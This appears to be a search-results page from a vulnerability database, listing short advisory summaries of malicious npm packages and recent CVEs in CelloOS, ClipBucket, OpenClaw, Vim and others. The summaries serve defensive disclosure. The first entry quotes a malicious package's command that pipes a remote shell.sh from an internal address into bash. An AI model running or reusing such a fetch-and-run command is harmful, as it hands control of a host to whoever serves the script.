
30851 matches found

OSSF Malicious Packages
added 2 hours ago, 2 views

Malicious code in internallib_v856 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d94a6872645a3d5b938f9bc48871dbdff18068bd32d04169c3e421cd6830934a The package's main entry index.js exports a single function command that invokes /bin/bash -c "curl -s http://10.0.0.145:8080/shell.sh | bash || wget...

AI score: 5.5
Exploits: 0, References: 1
OSSF Malicious Packages
added 2 hours ago, 2 views

Malicious code in internallib_v984 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3c46879ad94169111411f91b210779628bb14a5d16843ec2bec42bf418affdf8 Package exports a single command function that, when invoked, performs three coordinated attacks against the host: 1 appends a hardcoded...

AI score: 5.4
Exploits: 0, References: 6
NVD
added 10 hours ago, 8 views

CVE-2026-12059

The SSH service of CelloOS developed by Cellopoint has an Improper Access Control vulnerability, allowing authenticated remote attackers to bypass the enforced command restrictions and execute operating system commands outside the originally authorized scope...

CVSS: 8.8
Exploits: 0, References: 2
Cvelist
added 11 hours ago, 12 views

CVE-2026-12059 Cellopoint|CelloOS - Improper Access Control

The SSH service of CelloOS developed by Cellopoint has an Improper Access Control vulnerability, allowing authenticated remote attackers to bypass the enforced command restrictions and execute operating system commands outside the originally authorized scope...

CVSS: 8.8
Exploits: 0, References: 2
GithubExploit
added 13 hours ago, 30 views

linux-privesc-linpeas

🐧 linux-privesc-linpeas End-to-end Linux privilege escalati...

CVSS: 7.8, AI score: 7.5, EPSS: 0.93929
Exploits101
Nuclei
added 14 hours ago, 607 views

Chamilo LMS <= 1.11.24 - Remote Code Execution

Unrestricted file upload in big file upload functionality in /main/inc/lib/javascript/bigupload/inc/bigUpload.php in Chamilo LMS <= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell. id: CVE-2023-422...

CVSS: 8.1, AI score: 7.5, EPSS: 0.93236
Exploits: 27, References: 4
Nuclei
added 14 hours ago, 6 views

Pinger 1.0 - Remote Code Execution

Pinger 1.0 contains a remote code execution vulnerability that allows attackers to inject shell commands through the ping and socket parameters. Attackers can exploit the unsanitized input in ping.php to write arbitrary PHP files and execute system commands by appending shell metacharacters. id:...

CVSS: 9.8, AI score: 6.6, EPSS: 0.16324
Exploits: 0, References: 2
Positive Technologies
added 17 hours ago, 8 views

PT-2026-48830

The SSH service of CelloOS developed by Cellopoint has an Improper Access Control vulnerability, allowing authenticated remote attackers to bypass the enforced command restrictions and execute operating system commands outside the originally authorized scope...

CVSS: 8.8, AI score: 5.5
Exploits: 0, References: 3
Vulnrichment
added yesterday, 4 views

CVE-2026-42846 ClipBucket: Remote Play URL Command Injection

ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.3 - 140, ClipBucket's Remote Play feature allows any authenticated user to add a video by importing an external URL as the source. Some shell commands are run with the URL as a parameter. The URL is concatenated directly...

CVSS: 9.8, AI score: 5.5
Exploits: 0, References: 1
EUVD
added yesterday, 8 views

EUVD-2026-36367

ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.3 - 140, ClipBucket's Remote Play feature allows any authenticated user to add a video by importing an external URL as the source. Some shell commands are run with the URL as a parameter. The URL is concatenated directly...

CVSS: 9.8, AI score: 5.7
Exploits: 0, References: 1
NVD
added yesterday, 6 views

CVE-2026-45172

Due to incomplete input validation in Idira Privileged Session Manager for SSH PSMP versions prior to 15.0.2, 14.6.3, 14.2.5, and 14.0.6, an authenticated, low-privileged user could potentially execute arbitrary commands on the PSMP host. CyberArk Security Bulletins: CA26-17 and CA26-18...

CVSS: 8.7
Exploits: 0, References: 4
OSSF Malicious Packages
added yesterday, 5 views

Malicious code in internallib_v557 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 275af9596caf2b68994ca8282da7e127f8a4478e07888dbae73826328b4e41f2 index.js implements a multi-step attack against an internal npm registry. On invocation of the exported command, it: 1 creates a Verdaccio user...

AI score: 5.4
Exploits: 0, References: 22
OSV
added yesterday, 3 views

MAL-2026-5678 Malicious code in internallib_v557 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5cfa498f80e5965de3c072803c8d6e812e75bc5a4fb031f739cbd9c181724be3 internallib_v557 has no legitimate functionality — its single exported command function in index.js writes a malicious package.json to...

AI score: 5.4
Exploits: 0, References: 1
CVE
added yesterday, 15 views

CVE-2026-45172

The CVE describes an input validation flaw in Idira Privileged Session Manager for SSH (PSMP). An authenticated, low-privilege user could potentially execute arbitrary commands on the PSMP host due to incomplete input validation in PSMP versions prior to 15.0.2, 14.6.3, 14.2.5, and 14.0.6. Affecte...

CVSS: 8.7, AI score: 5.9
Exploits: 0, References: 4
NVD
added yesterday, 6 views

CVE-2026-53806

OpenClaw before 2026.5.12 contains a shell option parsing vulnerability that allows combined POSIX shell flags to bypass exec revalidation checks. Attackers can exploit this by using combined shell options to execute inline shell content without intended allowlist validation, potentially enabling...

CVSS: 8.8
Exploits: 0, References: 2
Vulnrichment
added yesterday, 3 views

CVE-2026-53806 OpenClaw < 2026.5.12 - Shell Option Parsing Bypass in Exec Revalidation

OpenClaw before 2026.5.12 contains a shell option parsing vulnerability that allows combined POSIX shell flags to bypass exec revalidation checks. Attackers can exploit this by using combined shell options to execute inline shell content without intended allowlist validation, potentially enabling...

CVSS: 8.8, AI score: 5.7
Exploits: 0, References: 2
Cvelist
added yesterday, 21 views

CVE-2026-53806 OpenClaw < 2026.5.12 - Shell Option Parsing Bypass in Exec Revalidation

OpenClaw before 2026.5.12 contains a shell option parsing vulnerability that allows combined POSIX shell flags to bypass exec revalidation checks. Attackers can exploit this by using combined shell options to execute inline shell content without intended allowlist validation, potentially enabling...

CVSS: 8.8
Exploits: 0, References: 2
CVE
added yesterday, 6 views

CVE-2026-53806

OpenClaw vulnerability CVE-2026-53806 affects OpenClaw prior to version 2026.5.12. A shell option parsing flaw allows combined POSIX shell flags to bypass exec revalidation checks, enabling execution of inline shell content without the intended allowlist validation when the affected feature is en...

CVSS: 8.8, AI score: 5.8
Exploits: 0, References: 2
EUVD
added yesterday, 5 views

EUVD-2026-36312

OpenClaw before 2026.5.12 contains a shell option parsing vulnerability that allows combined POSIX shell flags to bypass exec revalidation checks. Attackers can exploit this by using combined shell options to execute inline shell content without intended allowlist validation, potentially enabling...

CVSS: 8.8, AI score: 5.8
Exploits: 0, References: 2
CVE
added yesterday, 6 views

CVE-2026-47162

Vim (with the netrw plugin) is affected by CVE-2026-47162 due to a Vimscript code injection in s:NetrwBookHistSave() when serializing directory paths to the history file ~/.vim/.netrwhist. A directory name from the filesystem can be interpolated into a single-quoted Vimscript string literal witho...

CVSS: 7.3, AI score: 5.9
Exploits: 0, References: 3